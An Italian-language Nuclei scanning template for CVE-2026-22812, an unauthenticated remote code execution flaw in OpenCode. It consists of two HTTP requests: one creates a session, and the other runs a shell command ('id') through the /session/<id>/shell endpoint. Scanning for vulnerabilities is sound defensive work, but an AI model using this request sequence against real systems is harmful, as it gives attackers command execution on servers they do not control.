
Nuclei template per rilevare e sfruttare l'esecuzione remota di codice non autenticata in OpenCode tramite richieste HTTP appositamente costruite.
CVE-2026-22812 - Modello Nuclei per RCE non autenticata su OpenCode per la scansione.
POST /session HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Content-Type: application/json
Content-Length: 2
{}
POST /session/"id"/shell HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Content-Type: application/json
Content-Length: 44
{
"agent": "build",
"command": "id"
}